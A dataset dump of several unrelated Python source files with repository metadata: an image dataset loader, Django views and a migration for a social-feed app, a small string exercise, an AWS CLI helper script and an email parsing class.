if image.shape[0] <= 80 and image.shape[1] <= 64:
hight = 80
weight = 64
pad_weight1 = int((weight - image.shape[1])/2)
pad_weight2 = weight - image.shape[1] - pad_weight1
pad_hight1 = int((hight - image.shape[0])/2)
pad_hight2 = hight - image.shape[0] - pad_hight1
elif image.shape[0] > 80 and image.shape[1] <= 64:
print("#######################>80or<48#######################################")
print(image.shape[0],image.shape[1])
weight = 64
pad_weight1 = int((weight - image.shape[1])/2)
pad_weight2 = weight - image.shape[1] - pad_weight1
pad_hight1 = 0
pad_hight2 = 0
elif image.shape[0] < 80 and image.shape[1] > 64:
print("#######################<80or>48#######################################")
print(image.shape[0],image.shape[1])
hight = 80
pad_weight1 = 0
pad_weight2 = 0
pad_hight1 = int((hight - image.shape[0])/2)
pad_hight2 = hight - image.shape[0] - pad_hight1
elif image.shape[0] > 80 and image.shape[1] > 64:
print("#######################>80or>48#######################################")
print(image.shape[0],image.shape[1])
pad_weight1 = 0
pad_weight2 = 0
pad_hight1 = 0
pad_hight2 = 0
return pad_weight1, pad_weight2, pad_hight1, pad_hight2
def imgtransform_L(self, image, name):
size = np.array(image, dtype=np.uint8).shape
if name.startswith('site1') or name.startswith('site2'):
image = image.resize((math.ceil(2*size[1]),math.ceil(2*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site4'):
image = image.resize((math.ceil(1.16*size[1]),math.ceil(1.16*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site3'):
image = np.array(image, dtype=np.float32)
image = image / 255.0
mean = image.mean()
std = image.std()
pad_weight1, pad_weight2, pad_hight1, pad_hight2 = self.get_padshape(image)
image = np.pad(image,((pad_hight1, pad_hight2),(pad_weight1, pad_weight2)),"constant")
# image = anisodiff(image, 4, 0.1, 0.1)
# normalize image
image = (image - mean)/(std+1e-10)
image = (image - image.min()) / (image.max()-image.min()+1e-10) * 2.0
image = image - 1.0
image_shape = image.shape
image = np.expand_dims(image, axis=0)
image = torch.FloatTensor(image)
return image, image_shape
def imgtransform_RGB(self, image, name):
size = np.array(image).shape
if name.startswith('site1') or name.startswith('site2'):
image = image.resize((math.ceil(2*size[1]),math.ceil(2*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site4'):
image = image.resize((math.ceil(1.16*size[1]),math.ceil(1.16*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site3'):
image = np.array(image, dtype=np.float32)
image = image / 255.0
mean = image.mean()
std = image.std()
pad_weight1, pad_weight2, pad_hight1, pad_hight2 = self.get_padshape(image)
image = np.pad(image,((pad_hight1, pad_hight2),(pad_weight1, pad_weight2),(0,0)),"constant")
# image = anisodiff(image, 3, 0.1, 0.1)
# normalize image
image = (image - mean)/(std+1e-10)
image = (image - image.min()) / (image.max()-image.min()) * 2.0
image = image - 1.0
image_shape = image.shape
image = image.transpose((2,0,1))
image = torch.FloatTensor(image)
return image, image_shape
def binary_relation_map(self,image):
images_from = np.array(image,dtype=np.float32)[0]
images_pad = np.pad(images_from,((1,1),(1,1)),'constant')
images_to = np.zeros((8,images_from.shape[0],images_from.shape[1])) #,constant_values = (0.0,0.0)
images_to[0] = images_pad[:-2, 2:]
images_to[1] = images_pad[1:-1,2:]
images_to[2] = images_pad[2:, 2:]
images_to[3] = images_pad[:-2,1:-1]
images_to[4] = images_pad[2:,1:-1]
images_to[5] = images_pad[:-2,:-2]
images_to[6] = images_pad[1:-1,:-2]
images_to[7] = images_pad[2:, :-2]
diff_maps = images_to - images_from
diff_maps[diff_maps>=0] = 1.0
diff_maps[diff_maps<0] = 0.0
relation_map = torch.FloatTensor(diff_maps)
return relation_map
def compute_relation_map(self, image):
images_from = np.array(image,dtype=np.float32)[0]
images_pad = np.pad(images_from,((1,1),(1,1)),'constant')
images_to = np.zeros((8,images_from.shape[0],images_from.shape[1])) #,constant_values = (0.0,0.0)
images_to[0] = images_pad[:-2, 2:]
images_to[1] = images_pad[1:-1,2:]
images_to[2] = images_pad[2:, 2:]
images_to[3] = images_pad[:-2,1:-1]
images_to[4] = images_pad[2:,1:-1]
images_to[5] = images_pad[:-2,:-2]
images_to[6] = images_pad[1:-1,:-2]
images_to[7] = images_pad[2:, :-2]
diff_maps = images_to - images_from
relation_map = (diff_maps - diff_maps.min()) / (diff_maps.max()-diff_maps.min()+1e-10) * 2.0
relation_map = relation_map - 1.0
relation_map = torch.FloatTensor(relation_map)
return relation_map
def __len__(self):
return len(self.imgpaths)
def name(self):
return 'ZganDataset'
| [
"1952221507@qq.com"
] | 1952221507@qq.com |
524a0e10cc960c05791d380963683f0e8e163f49 | 545ab856301e0c6c3bfded93e3f1ef3eab9611b7 | /closends/views/main_page.py | cc47f688a0172e0f6b00a7017bbf9b7ee51f7f54 | [] | no_license | HITXYZ/Closends | bd64994c6e9acc514f8dcc43000521b52a66353f | b68461fc4bc8fc24738ecd65b3387a63af1f91f7 | refs/heads/master | 2021-08-30T01:36:16.142129 | 2017-12-13T06:26:54 | 2017-12-13T06:26:54 | 106,384,430 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,285 | py | from django.shortcuts import render
from django.core.cache import cache
from django.core.paginator import Paginator
from django.core.paginator import EmptyPage
from django.core.paginator import PageNotAnInteger
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.decorators import login_required
from django.contrib.contenttypes.models import ContentType
from ..models import WeiboContent, Image
from ..tasks import cached_query_all, cached_query_platform, \
cached_query_group, cached_query_topic, update_all_cache
"""
动态主页模块:
平台、分组、主题、时间、关键字查询
"""
topic_name = ['体育', '健康', '动漫', '女性', '娱乐', '房产',
'教育', '文学', '新闻', '旅游', '时尚', '校园',
'汽车', '游戏', '生活', '科技', '美食', '育儿', '财经']
@csrf_exempt
@login_required
def query_all(request, page=1):
user = request.user.userinfo
username = request.user.username
friends = user.friend_set.all()
group_list = user.group_list.split(',')
group_list = list(enumerate(group_list))
topic_list = list(enumerate(topic_name))
paginator = cache.get(username + '_paginator')
updated_list = cache.get_or_set('updated_list', set())
if username in updated_list:
flag = True
updated_list.remove(username)
cache.set('updated_list', updated_list, None)
cache.delete(username + '_paginator')
keys = cache.keys(username + '*')
update_all_cache.delay(keys)
elif not paginator:
flag = True
else:
flag = False
if flag:
cached_query_all.delay(username)
all_contents = []
for friend in friends:
weibo_contents = friend.weibocontent_set.all()
zhihu_contents = friend.zhihucontent_set.all()
tieba_contents = friend.tiebacontent_set.all()
content_type = ContentType.objects.get_for_model(WeiboContent)
for content in weibo_contents:
if not content.is_repost:
if content.has_image:
content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
else:
if content.origin_has_image:
content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
all_contents += weibo_contents
all_contents += zhihu_contents
all_contents += tieba_contents
all_contents.sort(key= lambda content: content.pub_date, reverse=True)
paginator = Paginator(all_contents, 20)
try:
contents = paginator.page(page)
except PageNotAnInteger:
contents = paginator.page(1)
except EmptyPage:
contents = paginator.page(paginator.num_pages)
result = {'group_list': group_list,
'topic_list': topic_list,
'contents': contents}
return render(request, 'closends/index.html', result)
@csrf_exempt
@login_required
def query_by_platform(request, platform, page=1):
user = request.user.userinfo
username = request.user.username
friends = user.friend_set.all()
group_list = user.group_list.split(',')
group_list = list(enumerate(group_list))
topic_list = list(enumerate(topic_name))
paginator = cache.get(username + '_' + platform + '_paginator')
updated_list = cache.get_or_set('updated_list', set())
if username in updated_list:
flag = True
updated_list.remove(username)
cache.set('updated_list', updated_list, None)
cache.delete(username + '_' + platform + '_paginator')
keys = cache.keys(username + '*')
update_all_cache.delay(keys)
elif not paginator:
flag = True
else:
flag = False
if flag:
cached_query_platform.delay(username, platform)
all_contents = []
if platform == 'weibo':
for friend in friends:
all_contents += friend.weibocontent_set.all()
content_type = ContentType.objects.get_for_model(WeiboContent)
for content in all_contents:
if not content.is_repost:
if content.has_image:
content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
else:
if content.origin_has_image:
content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
elif platform == 'zhihu':
for friend in friends:
all_contents += friend.zhihucontent_set.all()
elif platform == 'tieba':
for friend in friends:
all_contents += friend.tiebacontent_set.all()
all_contents.sort(key=lambda content: content.pub_date, reverse=True)
paginator = Paginator(all_contents, 20)
try:
contents = paginator.page(page)
except PageNotAnInteger:
contents = paginator.page(1)
except EmptyPage:
contents = paginator.page(paginator.num_pages)
result = {'group_list': group_list,
'topic_list': topic_list,
'current_platform': platform,
'contents': contents}
return render(request, 'closends/display_platform.html', result)
@csrf_exempt
@login_required
def query_by_group(request, group, page=1):
user = request.user.userinfo
username = request.user.username
friends = user.friend_set.all()
group_list = user.group_list.split(',')
topic_list = list(enumerate(topic_name))
paginator = cache.get(username + '_' + group_list[int(group)] + '_paginator')
updated_list = cache.get_or_set('updated_list', set())
if username in updated_list:
flag = True
updated_list.remove(username)
cache.set('updated_list', updated_list, None)
cache.delete(username + '_' + group_list[int(group)] + '_paginator')
elif not paginator:
flag = True
else:
flag = False
if flag:
cached_query_group.delay(username, group_list[int(group)])
all_contents = []
for friend in friends:
if friend.group == group_list[int(group)]:
weibo_contents = friend.weibocontent_set.all()
zhihu_contents = friend.zhihucontent_set.all()
tieba_contents = friend.tiebacontent_set.all()
content_type = ContentType.objects.get_for_model(WeiboContent)
for content in weibo_contents:
if not content.is_repost:
if content.has_image:
content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
else:
if content.origin_has_image:
content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
all_contents += weibo_contents
all_contents += zhihu_contents
all_contents += tieba_contents
all_contents.sort(key=lambda content: content.pub_date, reverse=True)
paginator = Paginator(all_contents, 20)
try:
contents = paginator.page(page)
except PageNotAnInteger:
contents = paginator.page(1)
except EmptyPage:
contents = paginator.page(paginator.num_pages)
group_list = list(enumerate(group_list))
result = {'group_list': group_list,
'topic_list': topic_list,
'current_group': group,
'contents': contents}
return render(request, 'closends/display_group.html', result)
@csrf_exempt
@login_required
def query_by_topic(request, topic, page=1):
user = request.user.userinfo
username = request.user.username
friends = user.friend_set.all()
group_list = user.group_list.split(',')
group_list = list(enumerate(group_list))
topic_list = list(enumerate(topic_name))
paginator = cache.get(username + '_' + topic_name[int(topic)] + '_paginator')
updated_list = cache.get_or_set('updated_list', set())
if username in updated_list:
flag = True
updated_list.remove(username)
cache.set('updated_list', updated_list, None)
cache.delete(username + '_' + topic_name[int(topic)] + '_paginator')
keys = cache.keys(username + '*')
update_all_cache.delay(keys)
elif not paginator:
flag = True
else:
flag = False
if flag:
cached_query_topic.delay(username, topic_name[int(topic)])
all_contents = []
for friend in friends:
weibo_contents = [content for content in friend.weibocontent_set.all() if content.topic == topic_name[int(topic)]]
zhihu_contents = [content for content in friend.zhihucontent_set.all() if content.topic == topic_name[int(topic)]]
tieba_contents = [content for content in friend.tiebacontent_set.all() if content.topic == topic_name[int(topic)]]
content_type = ContentType.objects.get_for_model(WeiboContent)
for content in weibo_contents:
if not content.is_repost:
if content.has_image:
content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
else:
if content.origin_has_image:
content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
all_contents += weibo_contents
all_contents += zhihu_contents
all_contents += tieba_contents
all_contents.sort(key=lambda content: content.pub_date, reverse=True)
paginator = Paginator(all_contents, 20)
try:
contents = paginator.page(page)
except PageNotAnInteger:
contents = paginator.page(1)
except EmptyPage:
contents = paginator.page(paginator.num_pages)
result = {'group_list': group_list,
'topic_list': topic_list,
'current_topic': topic,
'contents': contents}
return render(request, 'closends/display_topic.html', result)
| [
"zg_hit2015@163.com"
] | zg_hit2015@163.com |
7aa3b4ca0b62347e16f42050d1394ef9da533dca | 93179ac11ded2454149ece61c51f2ef8227d3999 | /Profile/migrations/0001_initial.py | ae67e05ec494d69a3c633d64b168811ff31f9848 | [] | no_license | Hloni253/HloniSite | 9f14e51854f3dc5b411ef9e771e2fbfbe0227bad | dca7d335687ee8c9fc46b7a61143f8219961873d | refs/heads/main | 2023-06-26T01:22:58.318594 | 2021-07-28T13:47:56 | 2021-07-28T13:47:56 | 390,359,433 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,937 | py | # Generated by Django 3.1.7 on 2021-06-14 10:57
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Notes', '0001_initial'),
('Videos', '0001_initial'),
('Sites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Groups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('description', models.CharField(max_length=500)),
('creator', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='GroupCreator', to=settings.AUTH_USER_MODEL)),
('members', models.ManyToManyField(blank=True, related_name='GroupMembers', to=settings.AUTH_USER_MODEL)),
('notes', models.ManyToManyField(blank=True, related_name='GroupNotes', to='Notes.Notes')),
('sites', models.ManyToManyField(blank=True, related_name='GroupSites', to='Sites.Sites')),
('videos', models.ManyToManyField(blank=True, related_name='GroupVideos', to='Videos.Videos')),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.SlugField()),
('description', models.CharField(blank=True, max_length=500)),
('copied_notes', models.ManyToManyField(blank=True, related_name='Notes', to='Notes.Notes')),
('groups', models.ManyToManyField(blank=True, related_name='UserGroups', to='Profile.Groups')),
('saved_sites', models.ManyToManyField(blank=True, related_name='Sites', to='Sites.Sites')),
('saved_videos', models.ManyToManyField(blank=True, related_name='Videos', to='Videos.Videos')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='GroupComments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment', models.TextField()),
('date', models.DateTimeField(auto_now=True)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Profile.groups')),
('user', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='GroupCommentUser', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"lehlohonolomotloung407@gmail.com"
] | lehlohonolomotloung407@gmail.com |
945d6816e65ddcd5afe591b18b6347226f66c943 | bd1e0d03a0b7f07a1b6154df96fe7b52653845a6 | /Elementary/Find Message.py | 0de03555a90025aab2bccbab86e9b7d80474e3a3 | [] | no_license | thuan06/checkio.org-solution | cb43a97f1e7f43c2f0051bf4c5bca7b2dd330aac | 5e6d1be80b5faaf1a19370a5f32e8bd82bf38f9b | refs/heads/master | 2016-09-06T03:40:24.899368 | 2014-12-18T13:46:35 | 2014-12-18T13:46:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | __author__ = 'Thuan'
def find_message(text):
s=''.join([i for i in text if i.isupper()])
return str(s)
print find_message("How are you? Eh, ok. Low or Lower? Ohhh.")
| [
"thuan0610@gmail.com"
] | thuan0610@gmail.com |
20fb226181a168dd6671f5f065e241134074e33a | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /route53_write_f/dns-answer_test.py | f8d48671d2f746eca041962279f310374a54a8cc | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
"""
write_parameter("route53", "test-dns-answer") | [
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
4e27f85e6e44ae509d32786234d293e24fc8af61 | 7862625fabc748a5a44ff99b6ad5af53c973795f | /solsapp/urls.py | 9a25ba4f1c9dc0ec1d174ae91531bdc941d3d7e3 | [] | no_license | RakeshThirunahari/sols | 81eefcca9aab8552ac43a0a9bc3ab2a018443e8c | 0cd0d15d5d8d8c04e9cd8f197a0f71cd63e1c5b0 | refs/heads/main | 2023-02-26T03:02:05.246958 | 2021-02-02T16:39:00 | 2021-02-02T16:39:00 | 335,319,465 | 0 | 0 | null | 2021-02-03T08:28:59 | 2021-02-02T14:39:20 | HTML | UTF-8 | Python | false | false | 472 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name = 'SolsHome'),
path('List', views.listview, name = 'SolsList'),
path('GetTableMeta', views.tablemeta, name = 'tablemeta'),
path('GetTableData', views.tabledata, name = 'tabledata'),
path('CreateList', views.createnewlist, name = 'updatetabledata'),
path('NewList', views.newlist, name = 'Newlist'),
path('EditList', views.editlist, name='Editlist'),
] | [
"rakesh.thirunahari@dhl.com"
] | rakesh.thirunahari@dhl.com |
6d6553258075a28f63b269f8f5e0ee499ae45d71 | 37ae8b0ecafd03bae01786b3fe7fc05b83f522a3 | /condicionais_finished.py | ad5c4cdf75df320b56124c5b3e19c48b6a690609 | [] | no_license | leocoelhodev/descobrindopython | a5d6b860ab05d9bf9e6840c660dbace39c8f20bf | f46da632347dd80fc52e1987b5cd69a992fe039e | refs/heads/main | 2023-05-27T04:25:30.535286 | 2021-06-15T10:28:45 | 2021-06-15T10:28:45 | 377,123,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | #
# Arquivo de exemplo das estruturas condicionais
#
def Condicionais():
x, y = 1000, 1000
if(x < y):
print("x é menor do que y")
elif (x == y):
print ("x é igual a y")
else:
print("x é maior do que y")
Condicionais() | [
"noreply@github.com"
] | noreply@github.com |
da4a6176bb44dd1e86e92d95b07eb36559743ae1 | 0c329252674b5d17f0b7f0685cb1ee3d06493475 | /email_classifier/email.py | 538bfdd72a1cba8b6895d512cedf317e53c29fc3 | [] | no_license | griffy/cs1573 | 56f12db035e8206ad3ac92aac38e4731b6edff13 | 52094dd9a7ef1cfc2abf4d87a7d494076cfe23c5 | refs/heads/master | 2021-01-10T11:00:12.347510 | 2013-04-14T21:17:41 | 2013-04-14T21:17:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,992 | py | import re
import os
to_regex_obj = re.compile(r"^X-To:.*", flags=re.UNICODE)
cc_regex_obj = re.compile(r"^X-cc:.*", flags=re.UNICODE)
bcc_regex_obj = re.compile(r"^X-bcc:.*", flags=re.UNICODE)
body_regex_obj = re.compile(r"^X-FileName:.*", flags=re.UNICODE)
from_regex_obj = re.compile(r"^X-From:.*", flags=re.UNICODE)
date_regex_obj = re.compile(r"^Date:.*", flags=re.UNICODE)
subject_regex_obj = re.compile(r"^Subject:.*", flags=re.UNICODE)
tod_regex_obj = re.compile(r'.*(\d{2}):\d{2}:\d{2}.*', flags=re.UNICODE)
name_regex_obj = re.compile(r"(.*)<", flags=re.UNICODE)
at_regex_obj = re.compile(r"(.*)@", flags=re.UNICODE)
nonword_char_regex_obj = re.compile(r'[^\w\s\'\-]|_', flags=re.UNICODE)
def parse_email(uri):
"""
Takes a URI to a file containing an email and returns
a tuple containing the following attributes:
(datetime, from, to, cc, bcc, subject, body)
"""
datetime = ''
header_from = ''
header_to = ''
header_cc = ''
header_bcc = ''
subject = ''
body = ''
with open(uri, 'r') as email:
body_found = False
lines = email.readlines()
for line in lines:
if body_found:
# skip the first empty line
if body or line.strip():
body += line
continue
if from_regex_obj.search(line):
header_from = line[len("X-From:"):].strip()
elif to_regex_obj.search(line):
header_to = line[len("X-To:"):].strip()
elif cc_regex_obj.search(line):
header_cc = line[len("X-cc:"):].strip()
elif bcc_regex_obj.search(line):
header_bcc = line[len("X-bcc:"):].strip()
elif date_regex_obj.search(line):
datetime = line[len("Date:"):].strip()
elif subject_regex_obj.search(line):
subject = line[len("Subject:"):].strip()
elif body_regex_obj.search(line):
body_found = True
return (datetime, header_from, header_to, header_cc, header_bcc, subject, body)
class Email(object):
"""
Given a URI to an email file, parses its contents and stores
relevant information as attributes
"""
def __init__(self, uri):
self.uri = uri
self.classification = os.path.split(os.path.dirname(uri))[1]
fields = parse_email(uri)
self.datetime = fields[0]
self.header_from = fields[1]
self.header_to = fields[2]
self.header_cc = fields[3]
self.header_bcc = fields[4]
self.subject = fields[5]
self.body = fields[6]
self.words = None
self.frequencies = {}
self.max_frequency = None
def _extract_name(self, contact):
"""
The names in the 'to, from, cc, bcc' sections of an email are often very muddy.
This is an attempt to normalize them to an extent.
- Sometimes its <name> <address>, <n2> <a2>,... :- just want names
- Sometimes of the form first.last@company :- just want first last
"""
name_groups = name_regex_obj.search(contact)
if name_groups:
contact = name_groups.group(1)
at_groups = at_regex_obj.search(contact)
if at_groups:
contact = contact.split('@')[0]
contact = contact.replace('.', ' ')
contact = contact.replace('\"', '')
return contact.strip()
def _extract_names(self, header_field):
"""
Given a header field (string), returns a list of the real names contained within
"""
names = []
for contact in header_field.split(','):
name = self._extract_name(contact)
if name:
names.append(name)
return names
def get_from_names(self):
"""
Returns a list of names found in the X-From field
"""
return self._extract_names(self.header_from)
def get_to_names(self):
"""
Returns a list of names found in the X-To field
"""
return self._extract_names(self.header_to)
def get_cc_names(self):
"""
Returns a list of names found in the X-cc field
"""
return self._extract_names(self.header_cc)
def get_bcc_names(self):
"""
Returns a list of names found in the X-bcc field
"""
return self._extract_names(self.header_bcc)
def get_sender_name(self):
"""
Returns the sender of this email
"""
return self.get_from_names()[0]
def get_receiver_names(self):
"""
Returns a list of names of receivers of this email
"""
return self.get_to_names() + self.get_cc_names() + self.get_bcc_names()
def get_names(self):
"""
Returns a list of all names in the header of the email
"""
return self.get_from_names() + self.get_receiver_names()
def get_hour(self):
"""
Returns the hour the email was received (0..24)
"""
hours_obj = tod_regex_obj.search(self.datetime)
if hours_obj:
return int(hours_obj.groups(1)[0])
raise ValueError("Hour not found")
def get_month(self):
"""
Returns the month the email was received as a three-letter abbreviation
"""
if re.search('Jan', self.datetime, re.IGNORECASE):
return 'Jan'
elif re.search('Feb', self.datetime, re.IGNORECASE):
return 'Feb'
elif re.search('Mar', self.datetime, re.IGNORECASE):
return 'Mar'
elif re.search('Apr', self.datetime, re.IGNORECASE):
return 'Apr'
elif re.search('May', self.datetime, re.IGNORECASE):
return 'May'
elif re.search('Jun', self.datetime, re.IGNORECASE):
return 'Jun'
elif re.search('Jul', self.datetime, re.IGNORECASE):
return 'Jul'
elif re.search('Aug', self.datetime, re.IGNORECASE):
return 'Aug'
elif re.search('Sep', self.datetime, re.IGNORECASE):
return 'Sep'
elif re.search('Nov', self.datetime, re.IGNORECASE):
return 'Nov'
elif re.search('Oct', self.datetime, re.IGNORECASE):
return 'Oct'
elif re.search('Dec', self.datetime, re.IGNORECASE):
return 'Dec'
raise ValueError("Month not present")
def get_time_of_day(self):
hour = self.get_hour()
if hour in range(9, 18):
return 'work'
elif hour in range(18, 22):
return 'evening'
elif hour in range(22, 25) or hour in range(0, 6):
return 'night'
elif hour in range(6, 9):
return 'morning'
def get_words(self):
"""
Returns a list of all words in the body of the email
"""
if self.words is not None:
return self.words
# replace non-word characters with spaces
word_character_string = nonword_char_regex_obj.sub(' ', self.body)
# lowercase everything
word_character_string = word_character_string.lower()
# split on whitespace characters
words = word_character_string.split()
# remove extraneous characters
for i in range(len(words)):
words[i] = words[i].strip("'-")
# remove non-words (two -- or '' won't be found in any real words)
words = filter(lambda w: w.find("--") == -1, words)
words = filter(lambda w: w.find("''") == -1, words)
# cache the result
self.words = words
return words
def count(self, word):
"""
Counts the occurrences of the given word in the email
"""
if word not in self.frequencies:
count = 0
for doc_word in self.get_words():
if word == doc_word:
count += 1
# cache the result
self.frequencies[word] = count
return self.frequencies[word]
def contains(self, word):
"""
Checks the existence of a word in an email
"""
if word not in self.frequencies:
flag = False
for doc_word in self.get_words():
if word == doc_word:
flag = True
break
return flag
return self.frequencies[word] > 0
def max_word_frequency(self):
"""
Returns the maximum frequency of any word in the email
"""
if self.max_frequency is None:
max_freq = 0
for word in self.get_words():
freq = self.count(word)
if freq > max_freq:
max_freq = freq
# cache the result
self.max_frequency = max_freq
return self.max_frequency
| [
"joel@joel-griffith.com"
] | joel@joel-griffith.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.